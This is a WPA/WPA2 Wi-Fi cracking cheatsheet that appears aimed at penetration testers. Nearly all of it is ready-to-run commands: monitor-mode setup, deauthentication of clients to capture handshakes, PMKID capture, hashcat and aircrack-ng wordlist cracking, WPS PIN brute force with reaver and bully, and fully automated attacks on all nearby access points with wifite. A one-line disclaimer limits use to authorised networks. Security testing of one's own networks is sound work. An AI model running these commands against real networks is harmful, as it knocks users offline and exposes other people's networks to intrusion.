WPA/WPA2 Cracking Cheatsheet

Command workflow for the aircrack-ng suite and modern hcxtools. Use only against networks you own or are authorised to test. Interface name (wlan0) and BSSID/channel will vary.

1. Monitor mode

sudo airmon-ng check kill          # stop NetworkManager/wpa_supplicant
sudo airmon-ng start wlan0         # creates wlan0mon
iw dev                             # confirm monitor interface

2. Discover networks and clients

sudo airodump-ng wlan0mon          # note target BSSID, CH, and connected STATION

3. Capture the WPA handshake

# lock onto the target channel and write a capture file
sudo airodump-ng -c <CH> --bssid <BSSID> -w capture wlan0mon

# in a second terminal, deauth a client to force a reconnect (handshake)
sudo aireplay-ng -0 5 -a <BSSID> -c <CLIENT_MAC> wlan0mon
# look for "WPA handshake: <BSSID>" in the airodump header

4. Crack with aircrack-ng

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <BSSID> capture-01.cap

5. Faster path with hashcat (recommended)

# capture directly to PMKID/handshake (no client needed for PMKID)
sudo hcxdumptool -i wlan0mon -o dump.pcapng

# convert to hashcat 22000 format
hcxpcapngtool -o hash.22000 dump.pcapng

# crack (mode 22000 = WPA-PBKDF2-PMKID+EAPOL)
hashcat -m 22000 hash.22000 /usr/share/wordlists/rockyou.txt

WPS attacks

wash -i wlan0mon                   # list WPS-enabled APs
reaver -i wlan0mon -b <BSSID> -vv  # online PIN brute force
bully wlan0mon -b <BSSID> -v 3     # alternative WPS attacker

Automated (Wifite)

sudo wifite                        # auto handshake/PMKID/WPS against nearby APs

Cleanup

sudo airmon-ng stop wlan0mon
sudo systemctl start NetworkManager

References

• Aircrack-ng documentation: https://www.aircrack-ng.org/documentation.html
• hashcat mode 22000 (WPA): https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2
• hcxtools (hcxdumptool / hcxpcapngtool): https://github.com/ZerBea/hcxtools